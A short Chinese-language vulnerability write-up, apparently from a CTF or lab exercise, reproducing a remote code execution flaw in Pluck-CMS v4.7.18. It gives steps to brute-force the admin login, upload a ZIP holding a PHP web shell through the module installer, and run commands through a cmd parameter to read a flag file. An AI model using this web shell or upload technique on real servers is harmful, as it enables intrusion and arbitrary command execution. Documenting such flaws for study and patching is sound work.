一、漏洞概述
Pluck-CMS v4.7.18 中的 /inc/modules_install.php 组件,攻击者可以通过上传一个精心制作的 ZIP 文件来执行任意代码。
二、影响范围
Pluck-CMS v4.7.18
三、访问页面
四、漏洞复现
1、点击admin,爆破登录密码,最终为admin123
2、登录后台,找到managemodules,点击installmodule
3、漏洞点installmodule,一个文件上传功能。
4、构造payload,制作phpinfo.php,并压缩为phpinfo.zip。
<?php phpinfo();system($_GET[cmd]);?>
5、上传phpinfo.zip
6、上传成功,自动跳转到phpinfo页面,拉到最下面可以看到上传后的文件路径。
/var/www/html/data/modules/phpinfo/phpinfo.php
7、执行RCE命令
/data/modules/phpinfo/phpinfo.php?cmd=cat%20/flag